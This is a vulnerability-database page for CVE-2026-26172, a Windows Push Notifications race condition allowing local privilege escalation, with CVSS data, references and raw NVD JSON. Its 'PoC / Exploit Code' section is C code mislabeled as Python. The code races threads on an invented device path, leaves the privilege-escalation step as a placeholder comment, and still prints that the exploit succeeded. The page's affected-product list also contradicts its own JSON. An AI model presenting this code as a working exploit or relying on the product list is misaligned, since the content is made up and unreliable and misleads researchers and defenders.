CVE-2026-26172

Description

Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:* - VULNERABLE

cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:* - VULNERABLE

Windows 10 Version 1507

Windows 10 Version 1607

Windows 10 Version 1809

Windows 10 Version 21H2

Windows 11 Version 21H2

Windows 11 Version 22H2

Windows 11 Version 23H2

Windows Server 2016

Windows Server 2019

Windows Server 2022

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for Race Condition in Windows Push Notifications
 * This code attempts to exploit a synchronization issue.
 * Note: This is a conceptual demonstration for educational purposes.
 */

#include <windows.h>
#include <stdio.h>

volatile BOOL isExploited = FALSE;

DWORD WINAPI Thread1(LPVOID lpParam) {
    // Simulate checking permission on a shared resource
    HANDLE hShared = CreateFile(L"\\.\WindowsPushNotificationShared", 
                                GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    
    if (hShared != INVALID_HANDLE_VALUE) {
        printf("[+] Thread 1: Accessed shared resource.\n");
        // Introduce a delay to widen the race window
        Sleep(100); 
        CloseHandle(hShared);
    }
    return 0;
}

DWORD WINAPI Thread2(LPVOID lpParam) {
    // Wait for the small window where Thread1 has checked but not finished
    Sleep(50);
    
    // Attempt to impersonate or modify the resource during the window
    HANDLE hShared = CreateFile(L"\\.\WindowsPushNotificationShared", 
                                GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL);
    
    if (hShared != INVALID_HANDLE_VALUE) {
        printf("[+] Thread 2: Exploited race condition!\n");
        // Logic to elevate privileges would go here
        isExploited = TRUE;
        CloseHandle(hShared);
    }
    return 0;
}

int main() {
    printf("[*] Starting PoC for CVE-2026-26172...\n");
    
    HANDLE hThreads[2];
    
    // Create racing threads
    hThreads[0] = CreateThread(NULL, 0, Thread1, NULL, 0, NULL);
    hThreads[1] = CreateThread(NULL, 0, Thread2, NULL, 0, NULL);
    
    WaitForMultipleObjects(2, hThreads, TRUE, INFINITE);
    
    if (isExploited) {
        printf("[+] Exploit successful. Privileges potentially escalated.\n");
    } else {
        printf("[-] Exploit failed. Race condition not triggered.\n");
    }
    
    CloseHandle(hThreads[0]);
    CloseHandle(hThreads[1]);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26172
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26172
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26172/
[4] VulDB https://vuldb.com/cve/CVE-2026-26172
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26172

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26172", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:16:51.757", "lastModified": "2026-04-24T17:21:20.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}, {"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "88A175C4-E033-4FE7-B2BF-8BAE14321BC4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "86DBF14A-F486-4FE7-9126-D1D54952FC6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19044.7184", "matchCriteriaId": "C375372B-D3D4-4B11-AAD8-69AC344C24BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "8CE2E268-E776-4697-9E43-33ABA4CDBE05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "269B8E88-6473-41DD-BA33-D9184B82CA58"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.19045.7184", "matchCriteriaId": "FCBB431B-EF21-4454-BDA3-D8F276BE7A64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "B33CE091-B873-4C30-BA05-54A8C1839212"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.22631.6936", "matchCriteriaId": "E3AF28F3-D486-4B88-9E0E-371241024174"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "94EB36C7-1FF2-4B44-AD91-F3540F09393E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26100.8246", "matchCriteriaId": "14B23C3F-C8AC-491A-BCA5-EB6982C8F9E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "361B5DAB-8D1F-45D7-A33C-F49EBA56B5F8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.26200.8246", "matchCriteriaId": "ADC6CE99-AB5D-4DD5-82A9-892366C4B2FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "690E74A8-E72C-47B6-96EB-37C48D69A635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "13A01FA1-08DC-4E33-9FFC-AB4BCD9634CA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.5020", "matchCriteriaId": "DC6837B7-5DFD-4AF7-B436-3C6FEF48BA60"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2274", "matchCriteriaId": "55A1F3AB-5299-4495-9A73-FDA23C6FD88D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.32690", "matchCriteriaId": "ADF41A14-B9DA-4788-82A8-74DCDCD090E1"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-26172", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}